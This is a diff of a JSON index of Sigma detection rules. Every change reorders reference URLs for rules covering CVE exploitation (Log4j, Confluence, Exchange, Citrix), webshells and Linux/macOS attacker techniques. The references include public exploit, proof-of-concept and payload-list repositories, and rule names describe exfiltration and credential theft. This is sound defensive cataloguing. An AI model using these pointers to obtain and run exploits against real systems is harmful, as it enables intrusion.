"https://mraddon.blog/2017/03/20/confluence-trick-to-create-pages-from-blueprint-templates/", + "https://github.com/TesterCC/exp_poc_library/blob/master/exp_poc/CVE-2021-26084_Confluence_OGNL_injection/CVE-2021-26084.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_26084_confluence_rce_exploit.yml" ], "tags": [ 
@@ -76627,8 +76627,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.anquanke.com/post/id/226029", "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/", + "https://www.anquanke.com/post/id/226029", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_solarwinds_supernova_webshell.yml" ], "tags": [ @@ -76652,8 +76652,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/LandGrey/CVE-2018-2894", "https://twitter.com/pyn3rd/status/1020620932967223296", + "https://github.com/LandGrey/CVE-2018-2894", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2018_2894_weblogic_exploit.yml" ], "tags": [ @@ -76689,9 +76689,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://dmaasland.github.io/posts/citrix.html", "https://support.citrix.com/article/CTX276688", "https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/", + "https://dmaasland.github.io/posts/citrix.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_8193_8195_citrix_exploit.yml" ], "tags": [ @@ -76724,8 +76724,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/", "https://github.com/search?q=CVE-2021-43798", + "https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_43798_grafana.yml" ], "tags": [ 
@@ -76758,8 +76758,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://githubmemory.com/repo/FunctFan/JNDIExploit", "https://github.com/pimps/JNDI-Exploit-Kit", + "https://githubmemory.com/repo/FunctFan/JNDIExploit", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_jndi_exploit.yml" ], "tags": "No established tags" @@ -76780,11 +76780,11 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ + "https://twitter.com/sec715/status/1373472323538362371", "https://twitter.com/Al1ex4/status/1382981479727128580", + "https://github.com/murataydemir/CVE-2021-27905", "https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186", "https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/", - "https://twitter.com/sec715/status/1373472323538362371", - "https://github.com/murataydemir/CVE-2021-27905", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_27905_apache_solr_exploit.yml" ], "tags": [ @@ -76818,9 +76818,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ + "https://www.yang99.top/index.php/archives/82/", "https://github.com/vnhacker1337/CVE-2022-27925-PoC", "https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/", - "https://www.yang99.top/index.php/archives/82/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_27925_exploit.yml" ], "tags": [ 
@@ -76854,10 +76854,10 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/", + "https://twitter.com/_0xf4n9x_/status/1572052954538192901", "https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/", "https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html", - "https://twitter.com/_0xf4n9x_/status/1572052954538192901", + "https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_36804_atlassian_bitbucket_command_injection.yml" ], "tags": [ @@ -76895,8 +76895,8 @@ "refs": [ "https://github.com/payloadbox/sql-injection-payload-list", "https://brightsec.com/blog/sql-injection-payloads/", - "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/", "https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/", + "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_sql_injection_in_access_logs.yml" ], "tags": "No established tags" @@ -76917,9 +76917,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/", "https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw", + "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_owassrf_poc_exploitation.yml" ], "tags": [ 
@@ -76987,8 +76987,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/", + "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_owassrf_exploitation.yml" ], "tags": [ @@ -77021,8 +77021,8 @@ "logsource.category": "No established category", "logsource.product": "No established product", "refs": [ - "https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/", "https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps", + "https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_nginx_core_dump.yml" ], "tags": [ @@ -77055,8 +77055,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html", "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784", + "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22893_pulse_secure_rce_exploit.yml" ], "tags": [ 
@@ -77148,10 +77148,10 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://twitter.com/yorickkoster/status/1279709009151434754", - "https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/", "https://support.f5.com/csp/article/K52145254", "https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/", + "https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/", + "https://twitter.com/yorickkoster/status/1279709009151434754", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_5902_f5_bigip.yml" ], "tags": [ @@ -77184,9 +77184,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ + "https://www.vmware.com/security/advisories/VMSA-2021-0002.html", "https://f5.pm/go-59627.html", "https://swarm.ptsecurity.com/unauth-rce-vmware", - "https://www.vmware.com/security/advisories/VMSA-2021-0002.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21972_vsphere_unauth_rce_exploit.yml" ], "tags": [ @@ -77252,9 +77252,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ + "https://github.com/rapid7/metasploit-framework/pull/17407", "https://github.com/0xf4n9x/CVE-2022-46169", "https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf", - "https://github.com/rapid7/metasploit-framework/pull/17407", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_46169_cacti_exploitation_attempt.yml" ], "tags": [ 
@@ -77289,11 +77289,11 @@ "logsource.product": "No established product", "refs": [ "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", - "https://news.ycombinator.com/item?id=29504755", "https://github.com/tangxiaofeng7/apache-log4j-poc", - "https://github.com/YfryTchsGD/Log4jAttackSurface", "https://twitter.com/shutingrz/status/1469255861394866177?s=21", "https://www.lunasec.io/docs/blog/log4j-zero-day/", + "https://news.ycombinator.com/item?id=29504755", + "https://github.com/YfryTchsGD/Log4jAttackSurface", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j_fields.yml" ], "tags": [ @@ -77384,9 +77384,9 @@ "logsource.product": "No established product", "refs": [ "https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/", - "https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md", "https://twitter.com/httpvoid0x2f/status/1532924261035384832", + "https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_java_payload_in_access_logs.yml" ], "tags": [ @@ -77445,8 +77445,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://portswigger.net/web-security/cross-site-scripting/contexts", "https://github.com/payloadbox/xss-payload-list", + "https://portswigger.net/web-security/cross-site-scripting/contexts", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_xss_in_access_logs.yml" ], "tags": "No established tags" 
@@ -77467,8 +77467,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://twitter.com/pyn3rd/status/1351696768065409026", "https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw", + "https://twitter.com/pyn3rd/status/1351696768065409026", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml" ], "tags": [ @@ -77607,8 +77607,8 @@ "logsource.product": "No established product", "refs": [ "https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92", - "https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst", "https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb", + "https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_susp_useragents.yml" ], "tags": [ @@ -77741,8 +77741,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://youtu.be/5mqid-7zp8k?t=2231", "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://youtu.be/5mqid-7zp8k?t=2231", "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_proxyshell.yml" ], @@ -77776,8 +77776,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://youtu.be/5mqid-7zp8k?t=2231", "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://youtu.be/5mqid-7zp8k?t=2231", "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_proxyshell_successful.yml" ], 
@@ -77827,11 +77827,11 @@
 "logsource.product": "No established product",
 "refs": [
 "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b",
- "https://news.ycombinator.com/item?id=29504755",
 "https://github.com/tangxiaofeng7/apache-log4j-poc",
- "https://github.com/YfryTchsGD/Log4jAttackSurface",
 "https://twitter.com/shutingrz/status/1469255861394866177?s=21",
 "https://www.lunasec.io/docs/blog/log4j-zero-day/",
+ "https://news.ycombinator.com/item?id=29504755",
+ "https://github.com/YfryTchsGD/Log4jAttackSurface",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j.yml"
 ],
 "tags": [
@@ -77930,9 +77930,9 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2",
- "https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild",
 "https://www.tenable.com/security/research/tra-2021-13",
+ "https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild",
+ "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml"
 ],
 "tags": [
@@ -78035,8 +78035,8 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://kb.vmware.com/s/article/85717",
 "https://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server",
+ "https://kb.vmware.com/s/article/85717",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22005_vmware_file_upload.yml"
 ],
 "tags": [ 
@@ -78069,12 +78069,12 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://twitter.com/bl4sty/status/1445462677824761878",
- "https://twitter.com/ptswarm/status/1445376079548624899",
- "https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782",
- "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml",
- "https://twitter.com/h4x0r_dz/status/1445401960371429381",
 "https://nvd.nist.gov/vuln/detail/CVE-2021-41773",
+ "https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782",
+ "https://twitter.com/h4x0r_dz/status/1445401960371429381",
+ "https://twitter.com/bl4sty/status/1445462677824761878",
+ "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml",
+ "https://twitter.com/ptswarm/status/1445376079548624899",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_41773_apache_path_traversal.yml"
 ],
 "tags": [
@@ -78107,9 +78107,9 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
+ "https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md",
 "https://vk9-sec.com/hfs-code-execution-cve-2014-6287/",
 "https://www.exploit-db.com/exploits/39161",
- "https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2014_6287_hfs_rce.yml"
 ],
 "tags": [ 
@@ -78144,9 +78144,9 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://github.com/lijiejie/IIS_shortname_Scanner",
- "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml",
 "https://www.exploit-db.com/exploits/19525",
+ "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml",
+ "https://github.com/lijiejie/IIS_shortname_Scanner",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_iis_tilt_shortname_scan.yml"
 ],
 "tags": [
@@ -78326,11 +78326,11 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://support.citrix.com/article/CTX267679",
 "https://support.citrix.com/article/CTX267027",
+ "https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md",
+ "https://support.citrix.com/article/CTX267679",
 "https://isc.sans.edu/diary/25686",
 "https://twitter.com/mpgn_x64/status/1216787131210829826",
- "https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_19781_citrix_exploit.yml"
 ],
 "tags": [
@@ -78440,8 +78440,8 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html",
 "https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/",
+ "https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html",
 "https://us-cert.cisa.gov/ncas/alerts/aa21-259a",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml"
 ], 
@@ -78511,8 +78511,8 @@
 "logsource.category": "file_event",
 "logsource.product": "macos",
 "refs": [
- "https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md",
+ "https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_emond_launch_daemon.yml"
 ],
 "tags": [
@@ -78570,8 +78570,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "macos",
 "refs": [
- "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md",
+ "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_screencapture.yml"
 ],
 "tags": [
@@ -79033,9 +79033,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "macos",
 "refs": [
- "https://www.manpagez.com/man/8/firmwarepasswd/",
- "https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web",
 "https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml",
+ "https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web",
+ "https://www.manpagez.com/man/8/firmwarepasswd/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml"
 ],
 "tags": [ 
@@ -79374,9 +79374,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "macos",
 "refs": [
- "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97",
 "https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/",
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset",
+ "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_wizardupdate_malware_infection.yml"
 ],
 "tags": [
@@ -79489,8 +79489,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "macos",
 "refs": [
- "https://gist.github.com/Capybara/6228955",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md",
+ "https://gist.github.com/Capybara/6228955",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml"
 ],
 "tags": [
@@ -79548,10 +79548,10 @@
 "logsource.category": "No established category",
 "logsource.product": "qualys",
 "refs": [
- "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists",
- "https://www.cisecurity.org/controls/cis-controls-list/",
- "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
 "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
+ "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists",
+ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
+ "https://www.cisecurity.org/controls/cis-controls-list/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/default_credentials_usage.yml"
 ],
 "tags": "No established tags" 
@@ -79570,9 +79570,9 @@
 "logsource.category": "No established category",
 "logsource.product": "qualys",
 "refs": [
- "https://www.cisecurity.org/controls/cis-controls-list/",
- "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
 "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
+ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
+ "https://www.cisecurity.org/controls/cis-controls-list/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/host_without_firewall.yml"
 ],
 "tags": "No established tags"
@@ -79593,9 +79593,9 @@
 "logsource.category": "No established category",
 "logsource.product": "No established product",
 "refs": [
- "https://www.cisecurity.org/controls/cis-controls-list/",
- "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
 "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
+ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
+ "https://www.cisecurity.org/controls/cis-controls-list/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/netflow_cleartext_protocols.yml"
 ],
 "tags": "No established tags"
@@ -79773,8 +79773,8 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/",
 "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor",
+ "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml"
 ],
 "tags": [ 
@@ -79815,8 +79815,8 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://linux.die.net/man/1/arecord",
 "https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa",
+ "https://linux.die.net/man/1/arecord",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_audio_capture.yml"
 ],
 "tags": [
@@ -79959,8 +79959,8 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/",
 "https://linux.die.net/man/1/xclip",
+ "https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_collection.yml"
 ],
 "tags": [
@@ -80008,9 +80008,9 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md",
 "https://linux.die.net/man/8/insmod",
 "https://man7.org/linux/man-pages/man8/kmod.8.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_load_module_insmod.yml"
 ],
 "tags": [
@@ -80069,9 +80069,9 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://github.com/berdav/CVE-2021-4034",
 "https://access.redhat.com/security/cve/CVE-2021-4034",
 "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034",
+ "https://github.com/berdav/CVE-2021-4034",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml"
 ],
 "tags": [ 
@@ -80105,8 +80105,8 @@
 "logsource.product": "linux",
 "refs": [
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md",
- "https://linux.die.net/man/1/import",
 "https://imagemagick.org/",
+ "https://linux.die.net/man/1/import",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencapture_import.yml"
 ],
 "tags": [
@@ -80188,9 +80188,9 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/",
 "https://mn3m.info/posts/suid-vs-capabilities/",
 "https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099",
+ "https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/",
 "https://man7.org/linux/man-pages/man8/getcap.8.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml"
 ],
@@ -80275,8 +80275,8 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md",
+ "https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml"
 ],
 "tags": [
@@ -80514,8 +80514,8 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://linux.die.net/man/1/wget",
 "https://gtfobins.github.io/gtfobins/wget/",
+ "https://linux.die.net/man/1/wget",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml"
 ],
 "tags": [ 
@@ -80664,8 +80664,8 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/",
 "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor",
+ "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml"
 ],
 "tags": [
@@ -80830,8 +80830,8 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://linux.die.net/man/1/xwd",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture",
+ "https://linux.die.net/man/1/xwd",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml"
 ],
 "tags": [
@@ -80922,10 +80922,10 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md",
- "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu",
 "https://man7.org/linux/man-pages/man1/passwd.1.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md",
 "https://linux.die.net/man/1/chage",
+ "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml"
 ],
 "tags": [ 
@@ -81050,10 +81050,10 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://linux.die.net/man/8/pam_tty_audit",
